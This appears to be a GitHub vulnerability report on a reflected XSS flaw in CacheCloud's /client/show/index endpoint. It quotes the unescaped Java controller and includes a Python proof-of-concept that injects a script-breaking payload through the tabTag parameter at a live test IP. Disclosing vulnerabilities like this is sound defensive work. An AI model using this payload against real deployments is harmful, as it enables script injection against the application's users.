
XSS vulnerability on /client/show/index #383

@NinjaGPT

Description


XSS vulnerability on /client/show/index

Summary

In the latest version (v3.2) of CacheCloud, the endpoint /client/show/index does not encode user-controllable parameters when rendering them in the web page, resulting in a cross-site scripting (XSS) vulnerability. This allows an attacker to launch XSS attacks against users of the application.

Details

  • SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/AppClientDataShowController.java#L62-L89
/**
 * Renders the client data page ("client/appClientIndex") for one application.
 *
 * Every request parameter after appId is copied into the model verbatim: there is
 * no validation and no encoding in this method. The view that renders these
 * attributes is not shown here; the reflected XSS reported in this issue arises
 * when that view writes any of them into HTML without escaping, so output
 * encoding in the view is the primary fix. As defence in depth the controller
 * could reject values that do not match the expected shape (e.g. the *Date
 * parameters as dates, pageNo as an integer, clientIp as an IP address, tabTag
 * and type against a fixed set) — the legitimate value sets are not visible
 * here, TODO confirm before adding such checks.
 *
 * @param request  source of all parameters; none of them is trusted
 * @param response not used in this method
 * @param model    receives appId, appDesc and the raw parameter values
 * @return the client index view when appId is positive, otherwise an empty view name
 */
@RequestMapping({"/index"})
public ModelAndView doIndex(HttpServletRequest request, HttpServletResponse response, Model model) {
    Long appId = NumberUtils.toLong(request.getParameter("appId"));
    // NOTE(review): if NumberUtils is commons-lang's, toLong() returns a primitive
    // long (0 on unparsable input), so the null check can never fail — confirm the import.
    if (appId != null && appId > 0L) {
        AppDesc appDesc = this.appService.getByAppId(appId);
        model.addAttribute("appId", appId);
        model.addAttribute("appDesc", appDesc);
        // Raw, unvalidated request parameters placed into the model as-is.
        model.addAttribute("tabTag", request.getParameter("tabTag"));
        model.addAttribute("type", request.getParameter("type"));
        model.addAttribute("searchDate", request.getParameter("searchDate"));
        model.addAttribute("commandStatisticsStartDate", request.getParameter("commandStatisticsStartDate"));
        model.addAttribute("commandStatisticsEndDate", request.getParameter("commandStatisticsEndDate"));
        model.addAttribute("exceptionStartDate", request.getParameter("exceptionStartDate"));
        model.addAttribute("exceptionEndDate", request.getParameter("exceptionEndDate"));
        model.addAttribute("valueDistriStartDate", request.getParameter("valueDistriStartDate"));
        model.addAttribute("valueDistriEndDate", request.getParameter("valueDistriEndDate"));
        model.addAttribute("costDistriStartDate", request.getParameter("costDistriStartDate"));
        model.addAttribute("costDistriEndDate", request.getParameter("costDistriEndDate"));
        model.addAttribute("clientIp", request.getParameter("clientIp"));
        model.addAttribute("pageNo", request.getParameter("pageNo"));
        model.addAttribute("firstCommand", request.getParameter("firstCommand"));
        model.addAttribute("timeDimensionality", request.getParameter("timeDimensionality"));
        return new ModelAndView("client/appClientIndex");
    } else {
        return new ModelAndView("");
    }
}

POC

# Reproduction script attached to the report. It sends the string given in the
# tabTag parameter to /client/show/index and prints the response body so the
# reflected value can be inspected. Host, port and referer below are specific to
# the reporter's test instance.
import requests
from requests.sessions import Session


class CustomSession(Session):
    """Session subclass that forces a fixed header set onto every request."""

    def request(
        self,
        method,
        url,
        params=None,
        data=None,
        headers=None,
        cookies=None,
        files=None,
        auth=None,
        timeout=None,
        allow_redirects=True,
        proxies=None,
        hooks=None,
        stream=None,
        verify=None,
        cert=None,
        json=None,
    ):
        # Names of the parameters forwarded to Session.request; locals() is
        # filtered against this tuple so that 'self' and 'arg_names' are dropped.
        arg_names = (
            'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth',
            'timeout', 'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
        )
        local_variables = locals()
        local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
        # Merge the fixed headers into whatever the caller supplied (caller
        # headers with the same key are overwritten).
        local_variables['headers'] = local_variables.get('headers') or dict()
        local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
        return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})


# Monkeypatch so that the module-level requests.post() below, which builds a
# Session internally, picks up the subclass — TODO confirm this patch point is
# honoured by the installed requests version.
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/client/show/index'
# Value reflected by the page; the closing tag is what breaks out of the
# surrounding script context if the view does not HTML-encode it.
malicious_payload = '</SCriPT><SCRiPt>alert("zast-xss")</scRIPt>'
params = {'appId': '1', 'tabTag': malicious_payload, 'type': '', 'searchDate': '', 'commandStatisticsStartDate': '', 'commandStatisticsEndDate': '', 'exceptionStartDate': '', 'exceptionEndDate': '', 'valueDistriStartDate': '', 'valueDistriEndDate': '', 'costDistriStartDate': '', 'costDistriEndDate': '', 'clientIp': '', 'pageNo': '', 'firstCommand': '', 'timeDimensionality': ''}
# verify=False disables TLS certificate checking; it has no effect on the plain
# http URL above and should not be copied into other code.
response = requests.post(url, params=params, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
  • Screenshot
Image
